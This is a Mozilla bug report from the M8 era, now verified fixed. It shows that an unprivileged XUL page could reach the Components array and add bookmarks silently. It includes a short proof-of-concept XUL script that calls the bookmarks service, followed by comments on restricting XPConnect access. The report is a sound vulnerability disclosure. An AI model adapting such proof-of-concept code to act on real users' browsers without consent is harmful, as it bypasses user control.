Closed Bug 10120 Opened 25 years ago Closed 25 years ago

Adding bookmarks without user's knowledge

Categories

(Core :: Security, defect, P3)

x86
Windows 95
defect

VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)

Details

Mozilla 5.0 M8 Win95 (guess all platforms) allows adding bookmarks without user's knowledge. I do not think this is a good idea, it at least may be used as a DoS attack. The code is:

-----------------bookm1.xul------------------------------------
<?xml version="1.0"?>
<!DOCTYPE window>
<window
  xmlns:html="http://www.w3.org/TR/REC-html40"
  xmlns:xul ="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"
  title = "Adding bookmarks">
<html:script>
<![CDATA[
function ab(url, title) {
  var bmks = Components.classes["component://netscape/browser/bookmarks-service"].getService( );
  bmks = bmks.QueryInterface(Components.interfaces.nsIBookmarksService);
  bmks.AddBookmark(url, title);
}
ab('http://www.netscape.com','script #1');
ab('http://www.netscape.com','script #2');
]]>
</html:script>
<html:h3>
This page adds two bookmarks without user's knowledge. Look at your bookmarks.
</html:h3>
</window>
---------------------------------------------------------------
Status: NEW → ASSIGNED
This hole should be closed by restricting use of the Components array.
Target Milestone: M11
Blocks: 12633
Depends on: 7261
Component: Browser-General → Security
QA Contact: leger → dshea
Updating QA contact.
Currently mozilla prints "loaded successfully", but no text is displayed in the window.
I consider this bug fixed by restricting access to the Components array - it gives the error: "Access denied to XPConnect service" after replacing "<window" with "<xul:window" and "</window>" with "</xul:window>" in the demo.
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
I've now checked in changes enabling XPConnect checks.
Status: RESOLVED → VERIFIED
QA Contact: dshea → junruh
Verified fixed.
Blocks: 7252
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
No longer depends on: 7261